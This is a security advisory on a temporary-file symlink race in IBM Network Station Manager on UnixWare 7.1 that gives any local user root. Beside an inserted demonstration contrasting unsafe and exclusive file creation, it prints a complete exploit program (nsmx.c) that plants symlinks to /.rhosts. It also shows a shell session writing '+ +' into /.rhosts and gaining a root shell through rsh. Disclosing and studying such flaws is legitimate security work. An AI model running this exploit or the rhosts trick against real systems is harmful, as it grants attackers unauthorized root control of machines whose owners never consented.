COMMAND
IBM NetStation Manager
SYSTEMS AFFECTED
IBM NetStation/UnixWare
PROBLEM
Brock Tellier found a vulnerability in IBM's Network Station
Manager that will allow any local user to gain root privileges.
Though he only tested NetStation on UnixWare 7.1, one would
imagine that this vulnerability is present on most NetStation
implementations. This daemon is installed/running as root by
default.
From the help html:
The IBM Network Station Manager is a browser-based tool for
centrally administering IBM Network Stations and their users.
Using the IBM Network Station Manager, the administrator can
set IBM Network Station settings on a server wide basis or an
individual user or workstation basis. Settings are
specifications defining hardware (keyboards, mouse speeds and
so on) and software as it applies to your session.
More or less, it's an http gui for managing your desktop
configuration. A vulnerability exists in the way NetStation
creates temporary files. Instead of using the secure-ish mktemp,
NetStation merely appends the current time in seconds to a known
file name. Normally, tmp races aren't a big deal for http
daemons since they run as nobody or similar, but NetStation must
run as root to be able to open/modify files as a specific user.
Thus, we can brute force a symlink from xnec.nsu.<time> to
/.rhosts and gain root.
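The temp-file race described above, as an added demonstration that is not NetStation's code or the advisory's exploit: the predictable prefix-plus-seconds name is created once without O_EXCL (the daemon's behaviour as described) and once with O_CREAT|O_EXCL, in a private scratch directory with a constructed "victim" file standing in for /.rhosts.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <unistd.h>

/* The advisory's pattern: a fixed prefix plus the current time in seconds,
 * a name any local user can predict and occupy first with a symlink. */
static void predictable_name(char *out, size_t n, const char *prefix, time_t now) {
    snprintf(out, n, "%s%ld", prefix, (long)now);
}

/* Unsafe: without O_EXCL, open() follows a symlink already sitting at the
 * predictable name, so a root daemon creates or truncates the link target. */
static int open_unsafe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Safe: O_CREAT|O_EXCL fails with EEXIST when anything, a symlink included,
 * already occupies the name; mkstemp() applies the same rule to a random suffix. */
static int open_safe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Stage the race in a private directory (constructed for the demo): plant a
 * symlink at the predictable name pointing at "victim", the stand-in for
 * /.rhosts, then try both opens. Returns 1 when the unsafe open followed the
 * link and the safe open refused; -1 if the setup itself failed. */
int demo_race(void) {
    char dir[] = "/tmp/nsmdemo.XXXXXX", victim[64], prefix[80], name[96];
    int fd, unsafe_followed, safe_refused;
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(prefix, sizeof prefix, "%s/xnec.nsu", dir);
    predictable_name(name, sizeof name, prefix, time(NULL));
    if (symlink(victim, name) != 0) return -1;      /* the local user's move */
    fd = open_unsafe(name);                         /* vulnerable daemon */
    unsafe_followed = (fd >= 0 && access(victim, F_OK) == 0);
    if (fd >= 0) close(fd);
    unlink(victim);
    fd = open_safe(name);                           /* fixed daemon */
    safe_refused = (fd < 0 && errno == EEXIST && access(victim, F_OK) != 0);
    if (fd >= 0) close(fd);
    unlink(name);
    rmdir(dir);
    return unsafe_followed && safe_refused;
}
```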
bash-2.02$ ls /usr/netstation/nsm/users/xnec
UX:ls: ERROR: Cannot access /usr/netstation/nsm/users/xnec: No such file or directory
<now we go to http://localhost:880, login and click on>
<Hardware -> Workstation>
bash-2.02$ ls /usr/netstation/nsm/users/xnec
xnec.nsu xnec.usr
bash-2.02$ cc -o nsmx nsmx.c
bash-2.02$ ./nsmx
<click on Workstation again>
bash-2.02$ ls -la /.rhosts
-rwx------ 1 xnec other 0 Dec 28 06:19 /.rhosts
bash-2.02$ echo "+ +" > /.rhosts
bash-2.02$ chown root /.rhosts
bash-2.02$ rsh -l root localhost sh -i
# id
uid=0(root) gid=3(sys)
groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit),10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp)
#
/* nsmx.c - IBM NetStation on UnixWare 7.1 local root exploit
 *
 * Exploits a temporary file race condition in NetStation's HTTP interface
 *
 * To exploit: first, change the paths below to reflect your individual
 * settings/paths. Don't worry if <username>.nsu doesn't exist, NS will
 * create it for you. Next, point your browser at
 * http://localhost:880 and login as a normal user. Click on "Hardware"
 * Then "workstation". This will create <netstationdir>/users/xnec.
 * Next, compile and run this program. You only have thirty seconds from
 * the time you complete this step to then click on "Workstation". When
 * this is done, you should have an /.rhosts which you own. On some
 * UnixWare systems, you may need to chown root /.rhosts in order to do
 * rsh -l root localhost sh -i.
 *
 * Brock Tellier btellier@usa.net
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <unistd.h>

int main(void) {
    /* Change these paths */
    char dest[] = "/.rhosts";                                   /* symlink target */
    char source[] = "/usr/netstation/nsm/users/xnec/xnec.nsu"; /* known prefix */
    char sourcesym[128];                                        /* prefix + seconds */
    time_t sec;
    int i;

    /* NetStation names the temp file <prefix><seconds since epoch>, so plant a
     * symlink at each of the next 30 candidate names. */
    sec = time(NULL);
    for (i = 0; i < 30; i++) {
        snprintf(sourcesym, sizeof sourcesym, "%s%ld", source, (long)(sec + i));
        symlink(dest, sourcesym);
    }
    return 0;
}
SOLUTION
Nothing yet.